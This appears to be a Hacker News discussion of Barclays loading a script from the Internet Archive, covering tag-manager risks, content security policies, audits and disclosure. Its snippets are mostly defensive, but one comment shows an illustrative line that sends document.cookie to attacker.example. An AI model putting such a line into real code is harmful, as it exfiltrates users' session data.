Content editors should not be able to add arbitrary code to a bank's website unless it undergoes review from someone who understands web security. If there is some kind of content editing tool, it should only allow content (not arbitrary scripts) to be edited.
Until about a year ago I was working as an FE developer for a major international bank.
All the processes and knowledge were in place to make sure all considerations were taken with our software with regards to security. But... all that good work and intention goes out the window when the marketing and analysis teams could pretty much, on a whim dump any old JS onto a production page via GTM. During my 18 months there, there were numerous issues (thankfully not security issues - at least that we know of) introduced via this method, including a full outage of the customer onboarding journey.
I see GTM being used (abused?) by marketing teams regularly, but I'm really surprised that a bank with its own development team would allow it.
It is really powerful and sometimes incredibly useful (e.g. I once built a schema.org metadata system that scraped the pages on the fly for a site with a broken CMS). Simo Ahava does clever things with it.
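For flavour, that schema.org trick was roughly this kind of thing: a GTM Custom HTML tag that scrapes the rendered page and injects JSON-LD. A rough sketch only; the selectors and fields below are made up for illustration, not the actual implementation:

    <script>
      // Illustrative GTM Custom HTML tag: scrape the rendered page and
      // inject schema.org Product metadata as JSON-LD.
      // Selectors and fields are placeholders, not a real site's markup.
      (function () {
        var name = document.querySelector('h1.product-title');
        var price = document.querySelector('.product-price');
        if (!name || !price) return; // not a product page, do nothing

        var jsonLd = {
          '@context': 'https://schema.org',
          '@type': 'Product',
          'name': name.textContent.trim(),
          'offers': {
            '@type': 'Offer',
            'price': price.textContent.replace(/[^0-9.]/g, ''),
            'priceCurrency': 'GBP'
          }
        };

        var tag = document.createElement('script');
        tag.type = 'application/ld+json';
        tag.text = JSON.stringify(jsonLd);
        document.head.appendChild(tag);
      })();
    </script>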
But from what I can tell, it seems to be a way of avoiding communication between teams, or a political power grab inside bigger companies - a parallel CMS. And the silly bit is that it's normally not doing much more than could be achieved by copy and pasting a few lines of code into a template.
I was once investigating "partner reporting that our embed loads slowly". The investigation result was something like: their HTML injects JS, which injects another JS, which injects GTM, which injects an SDK, which injects the embed.
Of course it all loads only when the user does not have any adblocking or tracking protections enabled.
It's a Google backdoor for your team to add more tracking etc.
The important point is that it's a backdoor for marketing (and adtech) teams to get around developer/security requirements. At some point, someone on those teams gets frustrated that their one-line code requests (just load this script! add a gif banner here!) keep falling behind in the backlog. That happens in part because the product team often doesn't care about marketing, and sometimes because developers know that "just one more script!" paves the road to hell. Eventually the third party that's trying to run its business through your business convinces the marketing team to add GTM, and the marketing team says to the dev team "Hey, we need GTM to implement THIS script". This time, because the other side has promised them $$$ in terms of ROI, the marketing team pushes really hard for it, and eventually a product manager approves the request to get them off their back. The rest, as they say, is history (at retro time, multiple times down the road).
Well the clue's in the name. But I'd argue that Google analysing metadata about who's loading what/when through GTM is a lesser evil, when compared to normalising everyone sticking megabytes of mystery scripts on their sites with the tool.
I'd say 'frontdoor' given that the standard first tag to implement is Google Analytics. But I am sure they also generate some data for their own use about the number and types of tags that each site is adding via GTM.
You can tell by the URL path (it's under /content/dam) that it's served by Adobe Experience Manager (Adobe's CMS, dam stands for digital asset manager, where you store static assets like images and js). The script itself is "target.js", which is Adobe Target - their A/B framework - which "supports custom code insertion"[1] similar to a tag manager.
It's not GTM, but this is like loading the GTM script itself from archive.org.
It's worth noting that AEM is often very badly set up, following requirements from managers who have no idea or concern about web development, and later maintained by low cost content editors who barely know some HTML. Moreover, this CMS seems to be a standard for big sites even though the licenses are costly, development is slow and complicated, and it adds a lot of human hours to the site maintenance.
> All the processes and knowledge were in place to make sure all considerations were taken with our software with regards to security. But... all that good work and intention goes out the window when the marketing and analysis teams could pretty much, on a whim dump any old JS onto a production page via GTM.
That's what's great about content security policies: put a CSP on the page, and when people try to add scripts without going through the proper process, they just won't run.
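A minimal sketch of such a policy (illustrative values, obviously not Barclays' actual config):

    Content-Security-Policy: default-src 'self'; script-src 'self' https://www.googletagmanager.com; object-src 'none'; base-uri 'self'; report-uri /csp-reports

With that in place, a script pulled from web.archive.org (or anywhere else not on the list) simply doesn't execute, and the violation shows up in your CSP reports rather than in production behaviour.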
Yes, but it also won't allow GTM to load scripts off OTHER domains. It basically reintroduces the requirement for engineering to gate off 300 different adtech trackers.
I work for a large media company and this is exactly the reason we don't give editors access to GTM (or even all developers), nor do we allow tools such as Optimizely that are intended for A/B testing, and we went away from letting them paste HTML into articles to include custom elements.
Unfortunately, we still have lots of 3rd party stuff in GTM, and technically any ad can run random js on our sites. That's where most problems come from these days.
Editors still technically have the power to brick a given site through our old inhouse CMS which has no proper access control levels, hopefully not for long...
> technically any ad can run random js on our sites
If you configure your ad network to run all ads cross-domain, then they are very limited. For example, in GPT (which I work on) you call "googletag.pubads().setForceSafeFrame(true)".
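Roughly, that call goes in the page-level GPT setup; a minimal sketch (the ad unit path, sizes, and div id below are placeholders):

    <script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
    <script>
      window.googletag = window.googletag || { cmd: [] };
      googletag.cmd.push(function () {
        // Force every creative into a cross-domain SafeFrame so ad JS
        // can't touch the publisher page or its cookies directly.
        googletag.pubads().setForceSafeFrame(true);
        googletag
          .defineSlot('/1234567/example-slot', [300, 250], 'div-gpt-ad-example')
          .addService(googletag.pubads());
        googletag.enableServices();
      });
    </script>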
"customer onboarding journey" sounds altogether twee for a major international bank. Banks are mattresses with insurance policies. Why is there even a journey to be broken?
Because they have to know who you are in a fair bit of detail, both to comply with the law and to know who they should let take money out of the account. Because they need you to agree to a bunch of contracts. Because they need to get you things like a bank card. Because they need to decide if they want to lend you money (most often in the form of a credit card). And so on and so forth.
Fun story: I had a Barclaycard once. I chose to get bills/invoices via snail mail because I'm old fashioned. Didn't use the card for almost a year after signing up and then finally bought something online with it. Got an invoice the next month and paid it. Then got another invoice the month after, for 60ct, for the invoice sent via snail mail. Fair enough, they stated that when I signed up. But then I got another bill the following month because, you guessed it, the invoice for the invoice was sent via mail. I tried to be clever then and paid 1.20€, but that didn't work, since I still got a letter saying there was still enough money in my account to cover the invoice. So after four or five months I just gave up and canceled my account.
Adding scripts might be considered OK (content editors could be given light-weight developer tasks), but modifying the site's CSP definitely isn't. There aren't many things you can do to stop an attacker injecting code in to your site, but having a CSP that whitelists servers under your control and blocks everything else is something that you can implement. Changes to the CSP should not be done lightly.
The fact that the CSP is whitelisting archive.org makes this look like an attack to me, or at least a test run before a real attack. I don't believe this was a simple mistake.
I've audited e-banking websites before. Every file, every element needs to be accounted for. This is beyond "an honest mistake" and it should have been caught by any of the (many) scans the bank orders for its websites. And the scan/report should have caught that. Who does their scans/reports? What is the scope of these scans? Who reviews these reports?
This is not about content. Content is "make a new page with that template and add a photo and the new text about XYZ product". Not a new functionality/code.
I wonder who signed this off prior to release and what their wiki/Jira mentions.
Edit: e-banking and other banks websites/online presence(s).
Edit2/rant: I have been the go-to audit/sec/compliance guy for more than a decade. It amazes me that in this forum there are so few discussions/POVs on the audit/security element. In most cases (like this one), an experienced auditor would have picked this up in 20 minutes. If only Barclays (in this case) had bothered to escape the fixed, 10-year-old checklist/audit program, this would never have happened.
> This is beyond "an honest mistake" and it should have been caught by any of the (many) scans the bank orders for its websites. And the scan/report should have caught that. Who does their scans/reports? What is the scope of these scans? Who reviews these reports?
It is partially baffling at least. We had to do a standalone website ad campaign for a bank (same level/recognition as barclays) once, some kind of rewards program where all you could do was browse what was possible to redeem your points for. No accounts, no cart, no integration whatsoever, it was basically a static site (with some user interactivity). We'd get scanned constantly and were always made aware of mistakes or issues, one of them being 3rd party resources.
On the other hand, I wasn't too impressed with their security scanning. Two issues came up that made me doubt how much good this actually did.
The first was some kind of SSH vulnerability. We were using an older (but still supported) Amazon Linux AMI. The SSH package was actually patched, but the version string didn't match what the security tool expected. We had to get them to talk with AWS to confirm it was genuinely a patched version of SSH and that the security scanning tool just wasn't accepting it as valid.
The other was some kind of JavaScript vulnerability in a library. There was an open CVE on the library and an open issue on GitHub with comments on how to fix it, but the library itself wasn't being updated. I manually patched it and named it version x.y.z-patched or something. The report comes back that it's still a vulnerability. I'm like, what? Impossible, I just patched it and tested it myself; the CVE no longer works. So I just renamed it to x-patched.y.z and poof, we pass validation.
This was my first time with vulnerability testing and I was kinda let down by it. I assumed they had people (or tools) actually trying to exploit the site, the way I tested that my patch to the JavaScript library stopped the CVE from working, instead of just looking for version numbers and comparing them to a list of known issues.
I get what you are saying but I also think the parent has a point, if it was that easy to do an end run around the scanning (accidentally or otherwise) then it's not really suitable for auditing external parties. For your internal teams you can probably have some level of confidence they will fix it in good faith.
Scanning is useful to automate a "thing" but your audit is multifaceted and should probably require peer review (pull/merge requests).
In simple terms, scanning should _hopefully_ help a dev who wants to do the right thing, but it won't help a malicious dev, so you're gonna need something else.
Peer review, least privileged access, protective monitoring, etc.
When I was coming up as a CMS operator there were a lot of jobs to undertake site updates for banks and law firms - the JDs always carried caveats about needing to understand both regulatory and security issues.
I never applied as I like pushing the boundaries when it comes to using CMSs, but if they're calling it out from Day One it's also on the operator to not do it even if they could.
> A technical solution could be to add a strict CSP policy but in general the problem is broader and applies to a lot of banks.
The Web is broken, and CORS/CSP headers will only be able to fix some individual cases of a bigger, currently unfixable design problem.
The tons of random JS APIs brought into the browser without any real critical review have taken scripts on the web from being inherently safe by their initial design to no longer being so.
The state of things needs to be brought back to the point where arbitrary JS simply cannot mess up your browser by design, and where you can load resources from anywhere safely, regardless of the tricky settings of the now 10+ CSP-related headers.
Or, alternatively, there needs to be a way to completely shut down those APIs and any "advanced" functionality, with the loading of 3rd-party resources reinforced by cryptographic hashes and signature checks to verify what gets loaded.
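Subresource Integrity already covers a small slice of that: a script or stylesheet reference can carry a hash, and the browser refuses to run the file if the bytes don't match. A sketch (the digest below is a placeholder, not a real hash):

    <script src="https://cdn.example.com/lib.min.js"
            integrity="sha384-PLACEHOLDER_BASE64_DIGEST"
            crossorigin="anonymous"></script>

But that only protects resources the page author explicitly references; it does nothing about a script an attacker manages to inject.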
Imagine a situation where somebody manages to inject their own script into a bank's page not through an employee's negligence, but through some exploit.
You would still have an issue where there is simply no functionality to killswitch all those novel APIs of arguable safety, and tell the browser to shut down any script not explicitly listed as allowed on the site.
CSP has been an inconsistent, ever-growing standard with a history of implementation breakages. I think only CSP 3.0, and the long-WIP Trusted Types standard, have approached the level of being actually useful.
I've seen websites with a screen-long CSP header working around the standard's inconsistencies, like frame-src/child-src and form redirects. I think it's only a matter of time before somebody finds a chink in that weak armour.
The lack of a sane default policy makes you vulnerable the moment an attacker finds a way to redirect the browser to a non-CSP-protected page on your domain. Mitigations exist, but... many buts.
Reflection attacks, where an attacker injects your own hashed scripts or data-exfiltrating CSS onto pages where they shouldn't be, are still possible in various scenarios unless you inline all scripts and set a CSP per URL.
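By "hashed scripts" I mean hash-source entries in the policy, something like this (the digest is a placeholder):

    Content-Security-Policy: script-src 'sha256-PLACEHOLDER_DIGEST_OF_AN_ALLOWED_SCRIPT='

The catch is that the hash is valid wherever that header is sent, so a copy of one of your own allowed scripts can still be replayed on a page where it was never meant to run.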
Other data exfiltration sources and injection sinks keep being found a few times a year.
Hard disagree. WASM is as good an opportunity as any to enforce better security habits, and indeed seems to be designed specifically with browser security/sandboxing in mind. "Killing" WASM does precisely nothing to fix the status quo around JS insecurity.
It's kind of bizarre how many people are out to defend Barclays here. Normally HN is the first to criticize websites for bad Javascript, ugly fonts, scrolljacking, etc.
It's not the TSB IT fiasco but it's still an error on their part.
If people are cutting Barclays slack, perhaps it's because the guy on Twitter is painting this as a satanically evil deed when it was probably just someone making a stupid mistake.
Additionally, the aggregate bandwidth cost of delivering that JS file during its lifetime is probably less than $0.05. How many copies of this file would need to be concatenated to equal the size of David After Dentist?
No one levels up on the Internet — and especially Twitter — by being calm and reasonable.
I looked at the Tweet (you know, it's also the article title) and it does no such thing - even referring to this as the Internet Archive CDN.
This is entirely a strawman you are burning down to make light of the fact that, far from a stupid mistake, this is recklessness enabled by the joke of a "web development" industry. This stupidity is common practice and certainly no one in this thread seems even slightly inclined to clean it up.
Well, as a gesture it would be nice if they could just add some money for the lawsuits against the archive. Aside from being an unwilling CDN, it has quite some other perks.
Internet Archive as version control, I love it. There are some good comments in there; one guy determined it had been like this for a month, yikes. Peer review, anybody? Or maybe they only have one web dev and he's a junior, so the seniors don't inspect it as harshly.
It is extremely concerning, because it indicates how quality control is abandoned in the search for ever lower costs.
Embarrassing, if one considers that most of these issues should be caught by automation before code review even happens.
Such a symptom indicates extremely sloppy development process, and low security culture.
It would be interesting to use such fragmentary news to correct stock pricing, with respect to current management and processes.
This reminds me of the time I caught my mortgage lender using javascript loaded directly from a github repo on their mortgage application process. I reported it to them and they didn't understand the problem.
that's pretty funny but what is the problem with that? direct link, possibility of updating, same possibility of 404 as anything else, CDN and caching included
If it’s straight up linking a non-versioned file (e.g. the live file), it implies the owner of that GitHub repo has direct access to update and run code in clients' browsers. They could start shooting off API requests dumping the contents of cookies/localStorage, set up keylogging, etc. IMO it seems like a pretty big security hole.
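To make that concrete: whatever that repo serves runs as first-party code in the applicant's browser, so a single malicious or compromised commit could do something as simple as this (the endpoint is made up, purely illustrative):

    // One line added to the repo's JS quietly ships session data elsewhere.
    navigator.sendBeacon('https://attacker.example/collect', document.cookie);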
Anyone from BarclaysUK internal (IT) audit team reading this? I wonder what your scope is when you run audits on your webs...
Also.. that vulnerability scanner and pentester.. what kind of reports do they issue that they don't mention this JS source??
"Move Fast and Break Things" is not the motto you hope to see your bank adopting...
I had a problem with Natwest online banking where the "random" character entry was the same each time (first, second and third characters) - which reduces the security incredibly.
In a French bank 10 years ago, their e-banking system was recording the actual values you typed in, their positions within your 6-digit PIN, and your username. The logs were dropped on a shared drive so that backups could pick them up. The shared drive was readable by "Everyone".
IT fought hard and long on the risk of this whole 'setup'. They agreed when I reconstructed 5 PINs (I stopped at 5, the point was made). The CTO was dismissive about it, insisting "what are the odds of this happening?" The COO and CEO had a totally different (more sensible) opinion.
The Internet Archive rewrites the contents of archived pages and scripts to point URLs back at the archive. A better explanation than OP's clickbait is that someone went to the archive to copy/paste misplaced tracking code.
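For anyone unfamiliar: archived pages get their subresource URLs rewritten to point back at the archive, so copy/pasting markup from a snapshot drags the archive prefix along with it. Roughly like this (timestamp and path are truncated/illustrative):

    <!-- original -->
    <script src="https://www.barclays.co.uk/content/dam/.../target.js"></script>

    <!-- as it appears in a Wayback Machine snapshot -->
    <script src="https://web.archive.org/web/20200801000000js_/https://www.barclays.co.uk/content/dam/.../target.js"></script>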
Ooh, this reminds me that I saw a file being included straight from github.com on flyporter.com (Canadian regional airline)
Actually, extremely weirdly, they didn't include the "actual" file (the raw version of it) but ... they included the github page in the <script> tag...??
Go through a checkout on flyporter.com (use dates > Aug 31st as they're resuming service then) and you'll see
a <script> tag pointing at that github.com page right there in the source code, which makes no sense (try that URL in your browser!)
I contacted everyone I could find on LinkedIn who's working as CTO/CIO/etc. there, AND emailed them but never heard back. (this was 9 months ago... the issue is still there)
Isn't this how the British Airways checkout ended up being hacked?
For sites with a large % of the same people coming back on a daily or weekly basis, there's probably not much to be gained by serving static files from a CDN.
While that's true in terms of root cause analysis, the browser doesn't see it that way - all content on barclays.co.uk is equally trusted by the browser, so every other team is impacted by this.
It's really annoying how people like him blow these things out of proportion to shame and extort companies. Seems like he didn't even make a serious attempt to message them.
Have you ever tried to contact a big company for something small like that when you don't have a direct line for support? It's a complete waste of time. Shaming them publicly is the only way to do it without wasting your own time. If those companies don't want to get shamed publicly they can make an effort to provide a way for technical people to report minor issues IMO.
Why should he spend his time (=money) to chase down a multi-billion dollar company to get them to fix a stupid error when he'd be lucky to get a thank you email for the effort?
<Raises hand.> I have. Sometimes successfully, sometimes not.
Two successes:
- I'd determined that a large email provider was transiting a sizeable fraction of all 419 spam I was seeing (and knew that this was likely broadly representative). I looked up the product title with "project manager" and similar terms, called the corporate switchboard, and asked for them by name. The phone was picked up on the first ring, I explained the situation briefly, and fifteen minutes later I received a call from the manager in charge of that area, who kept in touch over the next three months as the issue was resolved.
- Another time my worksite had issues with another email service provider: glacially slow processing of our notification emails. I performed an executive email carpet bomb[1] after months of ineffective helpdesk attempts, with evidence of the issue. We were assigned a minder who helped resolve the issue.
Both were large companies (at the time), one of which I'm distinctly not inclined to consider favourably. Both responded in ways that exceeded expectations.
Someone on the internet named 'weev' tried to do that when the iPad first came out. He found they had an open JSON endpoint for completing email addresses from the device IMEI. He ended up in prison for trying to publicly shame AT&T.
Twitter author here. I didn't make any assertions about the impact of this issue. A respondent to the Tweet said they found this earlier and had already disclosed it to Barclays. I also tried to contact them for another issue and spent over 6 hours on hold before giving up. It's really annoying how people love to moan on HN without context.
You did say "Not to mention the scumbaggery of leeching bandwidth from a not-for-profit", which is attributing poor motive and character. Even without that, your general tone is scathing and accusing, over something that is likely a simple mistake by a fairly fresh or unskilled developer.
How would this happen? I’m imagining someone wanting to roll back a change, going to Internet Archive for the last known good day, viewing the source and copy/pasting into their editor/CMS? Points for creativity at least.
>"that is likely a simple mistake by a fairly fresh or unskilled developer."
I'd assume that for banks all code that goes into production gets audited. What's more, it is easy to run the code through some analyzers before it goes to production, where the presence of an external origin should be detected automatically and raise a flag.
If not it is gross negligence on the bank's side and deserves all the scathing and accusations it can get.
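A check like that is a few lines of tooling; a rough sketch of the idea (the allowlist and invocation are assumptions, not any bank's actual pipeline):

    // check-script-origins.js - fail the build if any <script src> points
    // outside an allowlist of first-party hosts. Minimal sketch only.
    const fs = require('fs');

    const ALLOWED_HOSTS = ['www.barclays.co.uk'];          // assumed allowlist
    const html = fs.readFileSync(process.argv[2], 'utf8'); // page to check

    const offenders = [...html.matchAll(/<script[^>]+src=["']([^"']+)["']/gi)]
      .map(m => m[1])
      .filter(src => /^https?:\/\//i.test(src))
      .filter(src => !ALLOWED_HOSTS.includes(new URL(src).hostname));

    if (offenders.length) {
      console.error('External scripts found:\n' + offenders.join('\n'));
      process.exit(1);
    }

Run something like that over the built HTML in CI (e.g. node check-script-origins.js dist/index.html, paths assumed) and the archive.org reference would have failed the pipeline before it ever shipped.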
>>> I'd assume that for banks all code that goes into production gets audited.
Code would be reviewed by a developer, not audited. The reviewer may or may not notice the dependency on archive.org, and may or may not care.
Speaking from experience, the bank may have a policy prohibiting external JavaScript while not having a CDN of its own able to host said dependencies.
I've worked in finance for the last 20 years. My code has never been audited and very rarely even peer reviewed. Then again, I work in back office and nothing web facing, so there's that.
When I was in high school in the 90s I did work at a bank after school. My job was to sort and file debit card applications. No one audited my work either. Part of my job when reviewing every card on file was to verify the balance on the account that backed the debit card. If the account balance was zero or less, I filled out a form to cancel the card to be faxed out in a batch. Typically had 20-50 cancellations per day in 3 hours of work. No one reviewed them before sent, the files were just filed away to be forgotten. Mind, this was a small rural bank, so that might have played into it.
"I'd assume that for banks all code that goes into production gets audited"
The point of tag managers is to let non-developers update production without going through a code deployment so the usual code review and oversight doesn't apply.
Also worth keeping in mind that this is the bank's marketing site. It's almost surely managed by a different team than the actual online banking site and probably has looser restrictions.
It screams virtue signalling to me. I'm not even sure where @BlackGirlsCode even comes into it apart from to announce to the world that the author cares about social justice issues.
You're doing some signaling of your own, intentional or not, when your only contribution to this thread has nothing to do with the overall topic and instead chose to make accusations without any information. I know you're capable of doing better than that.
"using as a CDN" implies a deliberate choice to me. Why not "because it was a convenient way for their developer to include it"? You don't know why. A lot of web developers don't know what CDNs are for too.
"because it was a convenient way for their developer to include it" implies it was a deliberate choice also, when there's no way in hell someone didn't do this as a mistake lol.
PLUS, "using as a CDN" is what the site was literally doing, from a functional standpoint. It was pulling that script from Internet Archive, using their upload bandwidth.
> "because it was a convenient way for their developer to include it" implies it was a deliberate choice also
I didn't word it well but that was my point. For the same reason, I wouldn't pick the "CDN" headline as it gives a possibly false narrative too.
> PLUS, "using as a CDN" is what the site was literally doing, from a functional standpoint. It was pulling that script from Internet Archive, using their upload bandwidth.
I'd be fine with "using their bandwidth". I don't see how the Internet Archive having a CDN or not is important to the story, and including this fact in the headline makes it sound important.
I don't think the author was implying that Barclays Bank was intentionally using the Internet Archive by using the term "CDN".
But, per your suggestion, if the title was something like "Barclays Bank using Internet Archive's bandwidth to load their JS assets" then it's essentially the same thing as saying they're using Internet Archive as a CDN.
A CDN is there to deliver asset files to websites, which is exactly what the Internet Archive was doing for Barclays Bank in this case. The author used the term "CDN" to describe the situation, or the position the Internet Archive was in relative to Barclays Bank.
Also using the term "CDN" would make it easier for people to understand what was happening just by reading the title.
>Why not "because it was a convenient way for their developer to include it"?
In the end, they would still be using IA as a CDN, no matter the verbiage. We can make a reasonable guess as to why, considering it's a really bad idea for many reasons; someone made a mistake. Intentional or not, it's a mistake all the same.
A technical solution could be to add a strict CSP policy but in general the problem is broader and applies to a lot of banks.
The real issue is that banks (and it's not specific to Barclays) are loading JavaScript code from third-parties.
The fact that it is InternetArchive (yet another Internet cache) is not more worrying than GoogleUserContent.com for example.
Otherwise, the "asking money for redemption/forgiveness" part to Barclays is a bit borderline in my opinion.